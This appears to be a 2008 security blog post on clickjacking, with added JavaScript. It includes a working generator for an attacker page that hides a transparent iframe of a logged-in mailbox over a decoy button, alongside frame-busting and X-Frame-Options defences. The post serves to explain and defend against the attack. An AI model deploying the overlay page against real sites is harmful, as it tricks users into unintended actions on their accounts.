Think of clickjacking as a relative of phishing, except that it uses web pages exactly the way they were designed to be used. Stripped down, it is nothing more than Dynamic HTML and CSS, or even just an iframe. Because of that, disabling scripting in your browser will not stop it: the attack itself needs no script, and turning JavaScript off can even knock out the script-based defences a site relies on. Real-world scenario: you log into a site such as Yahoo, then visit a page that loads Yahoo Mail in an iframe. On top of that iframe sits something else, say a picture or a game, acting as a cover over your mailbox. You click on the cover, and underneath lies the iframe of your mail, in which messages are being deleted, forwarded, etc. To see an example, go to http://www.planb-security.net/notclickjacking/iframetrick.html#really
NOTE: you will need a MySpace account that is set to private before trying this example.
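To make the scenario concrete, here is an added example (mine, not part of the original post) that generates the kind of attacker page described above: a visible decoy button with a fully transparent iframe of the victim site stacked on top of it, shifted so that one of the victim page's real buttons lands exactly under the decoy. The mail URL, the coordinates of the target button and the decoy label are all made-up values for the demo. Run it with Node to print the page:

```javascript
// Added example, not from the original post. The victim page
// (https://mail.example.test/inbox), the position of its "Delete" button
// and the decoy label are assumptions for the demo.

// Where to place the iframe so that the target control (at target.x/y
// inside the framed page) lands exactly under the decoy button (drawn at
// decoy.x/y on the attacker's page).
function alignFrame(target, decoy) {
  return { left: decoy.x - target.x, top: decoy.y - target.y };
}

// Minimal HTML escaping so the strings cannot break the generated markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Build the attacker's page. The iframe is fully transparent (opacity: 0)
// but stacked ABOVE the decoy (higher z-index), so the victim's click goes
// to the framed mailbox, not to the button they think they are pressing.
function buildClickjackPage(opts) {
  const { targetUrl, targetControl, decoy, decoyLabel } = opts;
  const pos = alignFrame(targetControl, decoy);
  return [
    '<!doctype html>',
    '<html><head><meta charset="utf-8"><title>Win a prize!</title>',
    '<style>',
    '  body { margin: 0; }',
    `  #decoy { position: absolute; left: ${decoy.x}px; top: ${decoy.y}px;`,
    '           width: 120px; height: 40px; z-index: 1; }',
    `  #victim { position: absolute; left: ${pos.left}px; top: ${pos.top}px;`,
    '            width: 1000px; height: 800px; border: 0;',
    '            opacity: 0; z-index: 2; }',
    '</style></head><body>',
    `<button id="decoy">${escapeHtml(decoyLabel)}</button>`,
    `<iframe id="victim" src="${escapeHtml(targetUrl)}"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Constructed demo input: the mailbox's "Delete" button is assumed to sit
// at (300, 200) inside the framed page; the decoy is drawn at (100, 50).
const DEMO = {
  targetUrl: 'https://mail.example.test/inbox',
  targetControl: { x: 300, y: 200 },
  decoy: { x: 100, y: 50 },
  decoyLabel: 'Play now',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildClickjackPage(DEMO));
}
```

The whole attack is the two CSS rules on `#victim`: no script runs on the attacker's page, which is why turning JavaScript off in the browser does nothing to stop it.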
So how can you stop this? Part of it is a Flash vulnerability, so make sure you are running at least Flash 10.x; to get the latest version go to http://get.adobe.com/flashplayer/. Firefox users are in luck: they are currently the only users who can be proactive about preventing this. Install the NoScript add-on (https://addons.mozilla.org/en-US/firefox/addon/722) and make sure ClearClick protection is enabled for both trusted and untrusted pages. Your next option is a text-based browser, since those do not lay out overlapping frames and have been shown not to be affected by clickjacking.
Web developers can try to prevent this by adding the following "frame-busting" JavaScript to their pages. Only do this on a site that never frames its own pages: the script forces the browser out of any frame, so it would also break legitimate framing. It compares the window objects rather than reading top.location.href, because reading a cross-origin location throws an error, while assigning to it is allowed:
<script type="text/javascript">
if (top !== self) {
    // We are inside someone else's frame: replace the whole window with our page.
    top.location = self.location.href;
}
</script>
Of course, whoever runs this exploit more than likely knows how to keep that script from running inside the iframe (for example, Internet Explorer's security="restricted" attribute on the iframe tag disables scripting in the framed page), so frame-busting on its own should not be relied on.
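Two added pieces that follow from that caveat (mine, not from the original post): a fail-closed version of the frame-buster, after the recommendation in Rydstedt, Bursztein, Boneh and Jackson's 2010 paper "Busting Frame Busting", which hides the page with CSS and only reveals it when script confirms it is top-level, so an attacker who disables scripting in the frame gets a blank page rather than a live one; and a small evaluator for the X-Frame-Options response header, the server-side control browsers added after this post was written, which needs no script on the page at all. The URLs and origins in it are assumed for the demo.

```javascript
// Added example, not from the original post. URLs and origins are assumed.

// 1. Fail-closed frame-busting markup ("Busting Frame Busting", 2010).
//    The body starts hidden; only script running at top level removes the
//    hiding rule. If the attacker disables script in the frame, the page
//    stays blank and there is nothing underneath the decoy to click on.
function failClosedFrameBuster() {
  return [
    '<style id="antiClickjack">body { display: none !important; }</style>',
    '<script type="text/javascript">',
    '  if (self === top) {',
    '    var antiClickjack = document.getElementById("antiClickjack");',
    '    antiClickjack.parentNode.removeChild(antiClickjack);',
    '  } else {',
    '    top.location = self.location;',
    '  }',
    '</script>',
  ].join('\n');
}

// 2. Decide whether a browser honouring X-Frame-Options would render
//    pageUrl inside a frame whose top-level document is topUrl.
//    header: null/undefined (not sent), "DENY", "SAMEORIGIN" or
//    "ALLOW-FROM <origin>" (Firefox-era syntax; Chrome never honoured it).
//    SAMEORIGIN is checked against the top-level document here, the
//    original semantics; later browsers check every ancestor frame.
function framingAllowed(header, pageUrl, topUrl) {
  const origin = (u) => new URL(u).origin;
  if (header == null || header.trim() === '') return true;   // no header: no protection
  const raw = header.trim();
  const value = raw.toUpperCase();
  if (value === 'DENY') return false;
  if (value === 'SAMEORIGIN') return origin(pageUrl) === origin(topUrl);
  if (value.startsWith('ALLOW-FROM ')) {
    const allowed = raw.slice('ALLOW-FROM '.length).trim();
    return origin(allowed) === origin(topUrl);
  }
  return true;   // unrecognised value: browsers ignore the header, so no protection
}

// Constructed walk-through: the attacker's game page frames a mailbox.
const ATTACKER_TOP = 'https://game.example.test/win';
const VICTIM_PAGE = 'https://mail.example.test/inbox';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('no header  :', framingAllowed(null, VICTIM_PAGE, ATTACKER_TOP));
  console.log('DENY       :', framingAllowed('DENY', VICTIM_PAGE, ATTACKER_TOP));
  console.log('SAMEORIGIN :', framingAllowed('SAMEORIGIN', VICTIM_PAGE, ATTACKER_TOP));
  console.log(failClosedFrameBuster());
}
```

The header is the control to prefer: it is enforced by the browser before any page content is shown, so there is no script for the attacker to disable. The fail-closed snippet is the fallback for clients that do not understand the header.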
As usual, following good security practice is probably the best way to avoid this exploit: only visit sites you know you can trust, and sign out of sites you have signed into, since a hidden frame of a logged-out session has nothing to act on.
Sunday, November 9, 2008